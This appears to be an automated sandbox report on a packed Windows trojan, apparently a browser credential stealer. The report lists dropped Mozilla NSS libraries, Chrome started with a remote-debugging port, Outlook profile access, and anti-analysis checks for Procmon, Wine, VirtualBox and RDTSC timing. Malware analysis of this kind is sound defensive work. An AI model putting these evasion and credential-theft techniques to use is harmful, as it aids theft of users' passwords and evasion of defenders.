Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C6B5E60 0_2_6C6B5E60
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C68BE70 0_2_6C68BE70
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C63DE10 0_2_6C63DE10
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C553EC0 0_2_6C553EC0
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C687F20 0_2_6C687F20
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C525F30 0_2_6C525F30
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C565F20 0_2_6C565F20
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C64DFC0 0_2_6C64DFC0
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C6B3FC0 0_2_6C6B3FC0
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C5DBFF0 0_2_6C5DBFF0
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C551F90 0_2_6C551F90
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C58D810 0_2_6C58D810
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C60F8F0 0_2_6C60F8F0
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C68B8F0 0_2_6C68B8F0
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C5CF8C0 0_2_6C5CF8C0
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C53D8E0 0_2_6C53D8E0
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C5638E0 0_2_6C5638E0
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C5AF960 0_2_6C5AF960
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C5ED960 0_2_6C5ED960
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C67F900 0_2_6C67F900
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C5E5920 0_2_6C5E5920
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C5699D0 0_2_6C5699D0
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C5C99C0 0_2_6C5C99C0
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C5959F0 0_2_6C5959F0
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C5C79F0 0_2_6C5C79F0
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C541980 0_2_6C541980
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C601990 0_2_6C601990
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C6B9A50 0_2_6C6B9A50
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C56FA10 0_2_6C56FA10
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C5D1A10 0_2_6C5D1A10
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C62DA30 0_2_6C62DA30
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C531AE0 0_2_6C531AE0
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C60DAB0 0_2_6C60DAB0
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C60FB60 0_2_6C60FB60
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C57BB20 0_2_6C57BB20
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C577BF0 0_2_6C577BF0
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C521B80 0_2_6C521B80
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C5F9BB0 0_2_6C5F9BB0
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C615B90 0_2_6C615B90
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C589BA0 0_2_6C589BA0
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\random(1).exe Code function: String function: 6C559B10 appears 97 times
Source: C:\Users\user\Desktop\random(1).exe Code function: String function: 6C6B09D0 appears 147 times
Source: C:\Users\user\Desktop\random(1).exe Code function: String function: 6C553620 appears 93 times
Source: C:\Users\user\Desktop\random(1).exe Code function: String function: 6C58C5E0 appears 35 times
Source: C:\Users\user\Desktop\random(1).exe Code function: String function: 6C669F30 appears 50 times
Sample file is different than original file name gathered from version info
Source: random(1).exe, 00000000.00000002.2028991333.000000006F902000.00000002.00000001.01000000.0000000A.sdmp Binary or memory string: OriginalFilenamemozglue.dll0 vs random(1).exe
Source: random(1).exe, 00000000.00000002.2028835685.000000006C705000.00000002.00000001.01000000.00000009.sdmp Binary or memory string: OriginalFilenamenss3.dll0 vs random(1).exe
Uses 32bit PE files
Source: random(1).exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: random(1).exe Static PE information: Section: fsoqnkix ZLIB complexity 0.995146165615727
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@17/36@6/7
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C590300 MapViewOfFile,GetLastError,FormatMessageA,PR_LogPrint,GetLastError,PR_SetError, 0_2_6C590300
Source: C:\Users\user\Desktop\random(1).exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\OI5WW9ZK.htm Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: random(1).exe, 00000000.00000002.2028416928.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, random(1).exe, 00000000.00000002.2018694881.0000000005672000.00000004.00000020.00020000.00000000.sdmp, random(1).exe, 00000000.00000002.2028728035.000000006C6BF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: random(1).exe, 00000000.00000002.2028416928.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, random(1).exe, 00000000.00000002.2018694881.0000000005672000.00000004.00000020.00020000.00000000.sdmp, random(1).exe, 00000000.00000002.2028728035.000000006C6BF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: random(1).exe, 00000000.00000002.2028416928.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, random(1).exe, 00000000.00000002.2018694881.0000000005672000.00000004.00000020.00020000.00000000.sdmp, random(1).exe, 00000000.00000002.2028728035.000000006C6BF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: random(1).exe, 00000000.00000002.2028416928.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, random(1).exe, 00000000.00000002.2018694881.0000000005672000.00000004.00000020.00020000.00000000.sdmp, random(1).exe, 00000000.00000002.2028728035.000000006C6BF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: random(1).exe, random(1).exe, 00000000.00000002.2028416928.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, random(1).exe, 00000000.00000002.2018694881.0000000005672000.00000004.00000020.00020000.00000000.sdmp, random(1).exe, 00000000.00000002.2028728035.000000006C6BF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: random(1).exe, 00000000.00000002.2028416928.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, random(1).exe, 00000000.00000002.2018694881.0000000005672000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: random(1).exe, 00000000.00000002.2028416928.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, random(1).exe, 00000000.00000002.2018694881.0000000005672000.00000004.00000020.00020000.00000000.sdmp, random(1).exe, 00000000.00000002.2028728035.000000006C6BF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: random(1).exe, 00000000.00000003.1902604599.0000000005565000.00000004.00000020.00020000.00000000.sdmp, FHIDAFHCBAKFCAAKFCFC.0.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: random(1).exe, 00000000.00000002.2028416928.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, random(1).exe, 00000000.00000002.2018694881.0000000005672000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: random(1).exe, 00000000.00000002.2028416928.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, random(1).exe, 00000000.00000002.2018694881.0000000005672000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
Source: random(1).exe ReversingLabs: Detection: 78%
Source: random(1).exe Virustotal: Detection: 77%
Source: random(1).exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: unknown Process created: C:\Users\user\Desktop\random(1).exe "C:\Users\user\Desktop\random(1).exe"
Source: C:\Users\user\Desktop\random(1).exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2320 --field-trial-handle=2280,i,4646147605048899530,4272269093725665048,262144 /prefetch:8
Source: C:\Users\user\Desktop\random(1).exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="" Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2320 --field-trial-handle=2280,i,4646147605048899530,4272269093725665048,262144 /prefetch:8 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe Section loaded: mozglue.dll Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe Section loaded: msvcp140.dll Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: random(1).exe Static file information: File size 1833472 > 1048576
Source: random(1).exe Static PE information: Raw size of fsoqnkix is bigger than: 0x100000 < 0x1a5400
Source: Binary string: mozglue.pdbP source: random(1).exe, 00000000.00000002.2028941439.000000006F8ED000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: random(1).exe, 00000000.00000002.2028728035.000000006C6BF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: nss3.pdb source: random(1).exe, 00000000.00000002.2028728035.000000006C6BF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: mozglue.pdb source: random(1).exe, 00000000.00000002.2028941439.000000006F8ED000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\random(1).exe Unpacked PE file: 0.2.random(1).exe.c80000.0.unpack :EW;.rsrc:W;.idata :W; :EW;fsoqnkix:EW;axozysaw:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;fsoqnkix:EW;axozysaw:EW;.taggant:EW;
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
PE file contains an invalid checksum
Source: random(1).exe Static PE information: real checksum: 0x1cabc1 should be: 0x1c8de0
PE file contains sections with non-standard names
Source: random(1).exe Static PE information: section name:
Source: random(1).exe Static PE information: section name: .idata
Source: random(1).exe Static PE information: section name:
Source: random(1).exe Static PE information: section name: fsoqnkix
Source: random(1).exe Static PE information: section name: axozysaw
Source: random(1).exe Static PE information: section name: .taggant
Source: freebl3.dll.0.dr Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr Static PE information: section name: .didat
Source: nss3.dll.0.dr Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr Static PE information: section name: .00cfg
Source: random(1).exe Static PE information: section name: fsoqnkix entropy: 7.955262014812053
Drops PE files
Source: C:\Users\user\Desktop\random(1).exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\random(1).exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\random(1).exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\random(1).exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\random(1).exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\random(1).exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\random(1).exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\nss3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\random(1).exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\random(1).exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\random(1).exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\random(1).exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\random(1).exe File created: C:\ProgramData\softokn3.dll Jump to dropped file
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Users\user\Desktop\random(1).exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\random(1).exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\random(1).exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\random(1).exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\random(1).exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\random(1).exe File created: C:\ProgramData\softokn3.dll Jump to dropped file

Boot Survival
barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\random(1).exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe Window searched: window name: Regmonclass Jump to behavior

Malware Analysis System Evasion
barindex
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\random(1).exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1050836 second address: 105083F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 105083F second address: 1050869 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F06D8B4D9D7h 0x0000000c js 00007F06D8B4D9CCh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1050A19 second address: 1050A1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1050A1D second address: 1050A45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 jmp 00007F06D8B4D9D8h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1050C96 second address: 1050C9B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1053AF1 second address: 1053B1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 nop 0x00000007 call 00007F06D8B4D9CBh 0x0000000c sbb ecx, 225FCE12h 0x00000012 pop esi 0x00000013 push 00000000h 0x00000015 pushad 0x00000016 clc 0x00000017 mov ecx, dword ptr [ebp+122D2C1Bh] 0x0000001d popad 0x0000001e push 8C040BB4h 0x00000023 push esi 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1053B1F second address: 1053B23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1053B23 second address: 1053B27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1053B27 second address: 1053B6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 add dword ptr [esp], 73FBF4CCh 0x0000000e mov edi, esi 0x00000010 push 00000003h 0x00000012 sub dh, FFFFFF8Fh 0x00000015 jng 00007F06D851854Bh 0x0000001b or dx, FDD8h 0x00000020 push 00000000h 0x00000022 mov dword ptr [ebp+122D3880h], eax 0x00000028 push 00000003h 0x0000002a jnl 00007F06D851854Bh 0x00000030 mov esi, 1AAF121Ch 0x00000035 push 84069BB0h 0x0000003a push ebx 0x0000003b push eax 0x0000003c push edx 0x0000003d jng 00007F06D8518546h 0x00000043 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1053C15 second address: 1053C8C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 xor dword ptr [esp], 76A3BBD7h 0x0000000e mov dx, si 0x00000011 push 00000003h 0x00000013 jmp 00007F06D8B4D9D6h 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push edi 0x0000001d call 00007F06D8B4D9C8h 0x00000022 pop edi 0x00000023 mov dword ptr [esp+04h], edi 0x00000027 add dword ptr [esp+04h], 00000019h 0x0000002f inc edi 0x00000030 push edi 0x00000031 ret 0x00000032 pop edi 0x00000033 ret 0x00000034 push 00000003h 0x00000036 mov edi, 22C85492h 0x0000003b call 00007F06D8B4D9C9h 0x00000040 jmp 00007F06D8B4D9D1h 0x00000045 push eax 0x00000046 jbe 00007F06D8B4D9D4h 0x0000004c pushad 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1053C8C second address: 1053CA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F06D8518546h 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 jg 00007F06D8518546h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1053CA4 second address: 1053CAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1053CAD second address: 1053CBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push esi 0x0000000e pop esi 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1053D7B second address: 1053D7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
